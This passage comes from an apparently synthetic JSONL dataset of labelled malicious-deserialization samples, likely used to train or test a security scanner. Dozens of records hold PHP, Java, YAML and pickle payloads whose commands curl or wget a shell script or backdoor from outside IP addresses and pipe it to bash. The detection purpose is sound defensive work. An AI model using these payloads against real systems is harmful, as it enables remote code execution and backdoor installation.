Monolog/RCE2\n// Target: system(\"id && wget http://36.157.198.45/bd\")"}}]} {"id": "synth_malicious_deserialization_00632", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:32:\"6KOyCvsgr/88tp0X/ND1fhPcAKQzXywB2KaVrHso\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://58.73.56.163/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:32:\"6KOyCvsgr/88tp0X/ND1fhPcAKQzXywB2KaVrHso\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://58.73.56.163/bd\")"}}]} {"id": "synth_malicious_deserialization_00633", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://114.76.231.152/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://63.72.57.40/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://114.76.231.152/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://63.72.57.40/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00634", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://219.12.127.186/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://219.12.127.186/shell\")"}}]} {"id": "synth_malicious_deserialization_00635", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://173.228.196.21/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://1.144.26.152/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://173.228.196.21/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://1.144.26.152/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00636", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:42:\"bKxQqDMDf8ZIRG3fUKgrt6tL2KfsCAV9wBdsvGLS\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://120.227.17.224/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:42:\"bKxQqDMDf8ZIRG3fUKgrt6tL2KfsCAV9wBdsvGLS\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://120.227.17.224/bd\")"}}]} {"id": "synth_malicious_deserialization_00637", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:30:\"U/WCcR3kvOPx3beHRQG1AVnvgFfY6mDezZAe71PN\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://163.205.109.38/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:30:\"U/WCcR3kvOPx3beHRQG1AVnvgFfY6mDezZAe71PN\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://163.205.109.38/bd\")"}}]} {"id": "synth_malicious_deserialization_00638", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://34.213.123.38/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://34.213.123.38/shell\")"}}]} {"id": "synth_malicious_deserialization_00639", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:58:\"gQF3pIqZbfheqeN0uyAen6F/OCqoVipzOyxnn01h\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://203.185.215.236/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:58:\"gQF3pIqZbfheqeN0uyAen6F/OCqoVipzOyxnn01h\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://203.185.215.236/bd\")"}}]} {"id": "synth_malicious_deserialization_00640", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('FsA9u+pW/Uc+drtkxBkrSfP5xbT8+pd7KJmpf5i1hu36cL0bKGWDjKj9u6Mp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://35.20.144.178/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('FsA9u+pW/Uc+drtkxBkrSfP5xbT8+pd7KJmpf5i1hu36cL0bKGWDjKj9u6Mp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00641", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:80:\"dXM+aMcsNcRh66p7Bz95i8dbVWfCOuuy+KwKDsYZ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://58.246.15.12/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:80:\"dXM+aMcsNcRh66p7Bz95i8dbVWfCOuuy+KwKDsYZ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://58.246.15.12/bd\")"}}]} {"id": "synth_malicious_deserialization_00642", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('u495Cs4qHxUCFGpf0OWHp1aMw0kb4OtyRh/MhRvYVj8ZL57KP1bnyxsQHBa8')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://132.195.63.64/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('u495Cs4qHxUCFGpf0OWHp1aMw0kb4OtyRh/MhRvYVj8ZL57KP1bnyxsQHBa8')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00643", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://239.183.33.87/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://203.14.82.75/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://239.183.33.87/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://203.14.82.75/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00644", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://85.78.60.202/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://233.140.32.198/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://85.78.60.202/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://233.140.32.198/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00645", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('MelzweyPW7uarKOGxukWHbTNN5nDEKBFaVJC4ELm2B+b2H71qSZARrHVV77f')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://111.220.182.119/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('MelzweyPW7uarKOGxukWHbTNN5nDEKBFaVJC4ELm2B+b2H71qSZARrHVV77f')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00646", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('NW3Cgf9vzPCbLeHHL0X5BUEF5bARJdhhC6Unh6TRqZLYLZhy6boMDs+UhCtR')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://138.26.90.161/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('NW3Cgf9vzPCbLeHHL0X5BUEF5bARJdhhC6Unh6TRqZLYLZhy6boMDs+UhCtR')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00647", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:47:\"XJp1kjJlImhdEg06Dzo7qoKz8NVOKuilDU1QQGpt\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://160.85.175.120/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:47:\"XJp1kjJlImhdEg06Dzo7qoKz8NVOKuilDU1QQGpt\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://160.85.175.120/bd\")"}}]} {"id": "synth_malicious_deserialization_00648", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('uupxWbA3agXbNpzAr51zjoi+bHOlknCLiTqG1Q0siIZu02i4XELgBsT+Rw2n')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://242.10.111.105/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('uupxWbA3agXbNpzAr51zjoi+bHOlknCLiTqG1Q0siIZu02i4XELgBsT+Rw2n')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00649", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://207.148.135.58/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://40.22.250.116/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://207.148.135.58/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://40.22.250.116/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00650", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://183.13.211.6/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://183.13.211.6/shell\")"}}]} {"id": "synth_malicious_deserialization_00651", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('yooBwvgGZnv2tJsI5YFoxDs/DLiHFtIcWmGPw9K04BA2SJjcA6I5dogxp8nZ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://129.31.142.183/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('yooBwvgGZnv2tJsI5YFoxDs/DLiHFtIcWmGPw9K04BA2SJjcA6I5dogxp8nZ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00652", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:74:\"CKUEJuaHUhchypysQVNvEXK09e0Qmz7uuRGxQdhh\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://26.156.212.225/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:74:\"CKUEJuaHUhchypysQVNvEXK09e0Qmz7uuRGxQdhh\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://26.156.212.225/bd\")"}}]} {"id": "synth_malicious_deserialization_00653", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://177.194.159.78/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://177.194.159.78/shell\")"}}]} {"id": "synth_malicious_deserialization_00654", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('brubAcYhYEwJJ3P38g0Pt7FcKCygOzTZD0i5ZVEYnPcXhzqgttYMEHX3Dyet')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://199.45.149.173/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('brubAcYhYEwJJ3P38g0Pt7FcKCygOzTZD0i5ZVEYnPcXhzqgttYMEHX3Dyet')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00655", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('nOmtVZRUl6ICuPBYjPVOkDCpdYPUigSsyRjwd8wi6nzZ6MLno5aLUfdCNHnf')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://95.216.122.148/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('nOmtVZRUl6ICuPBYjPVOkDCpdYPUigSsyRjwd8wi6nzZ6MLno5aLUfdCNHnf')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00656", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://121.103.106.8/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://129.231.187.194/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://121.103.106.8/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://129.231.187.194/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00657", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://121.240.225.218/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://121.240.225.218/shell\")"}}]} {"id": "synth_malicious_deserialization_00658", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('822M5xiBsZhszOYe3YAKwoTQEpUZ4q2sjik2zUDygvFOyCXb50oZgoKtzi72')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://50.23.173.131/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('822M5xiBsZhszOYe3YAKwoTQEpUZ4q2sjik2zUDygvFOyCXb50oZgoKtzi72')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00659", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://169.231.143.56/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://60.246.2.158/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://169.231.143.56/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://60.246.2.158/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00660", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://13.202.203.210/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://13.202.203.210/shell\")"}}]} {"id": "synth_malicious_deserialization_00661", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://107.128.117.121/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.188.120.32/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://107.128.117.121/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://139.188.120.32/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00662", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://15.255.241.53/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://88.185.195.149/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://15.255.241.53/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://88.185.195.149/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00663", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://118.106.162.222/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://118.106.162.222/shell\")"}}]} {"id": "synth_malicious_deserialization_00664", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('09PvmiQnPT/suY22VwKe04KH0y4/20n/udbZMhGO4bzncaFNsZlfnS4gIUaB')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://76.71.119.142/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('09PvmiQnPT/suY22VwKe04KH0y4/20n/udbZMhGO4bzncaFNsZlfnS4gIUaB')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00665", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://180.40.13.53/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://235.240.147.221/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://180.40.13.53/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://235.240.147.221/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00666", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('dcBm4zgoo+x4UH51gie51Hnpsj+iw7wxIBYqY8LIRE9Ncpkvg3DNLeVlGR7t')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://134.174.79.134/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('dcBm4zgoo+x4UH51gie51Hnpsj+iw7wxIBYqY8LIRE9Ncpkvg3DNLeVlGR7t')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00667", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('xeabdK68bHHUOEl4F3lzzFLOZ6Fb+1rMlTg9Rr22fW8YaA1aMLuJPiw5r6yr')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://102.243.182.12/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('xeabdK68bHHUOEl4F3lzzFLOZ6Fb+1rMlTg9Rr22fW8YaA1aMLuJPiw5r6yr')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00668", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://7.186.41.110/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://7.186.41.110/shell\")"}}]} {"id": "synth_malicious_deserialization_00669", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://240.226.144.80/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://48.180.103.137/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://240.226.144.80/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://48.180.103.137/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00670", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://45.148.129.18/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://108.52.153.181/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://45.148.129.18/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://108.52.153.181/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00671", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('fKS55JWbpLNVc0OzM4RgquHd6hy/SoeasX/UPM2SJpWWpr8aX5y8Alzaq07p')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://116.226.174.48/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('fKS55JWbpLNVc0OzM4RgquHd6hy/SoeasX/UPM2SJpWWpr8aX5y8Alzaq07p')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00672", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://53.229.65.73/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://230.126.100.34/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://53.229.65.73/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://230.126.100.34/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00673", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://156.121.164.78/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://241.137.221.62/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://156.121.164.78/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://241.137.221.62/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00674", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded 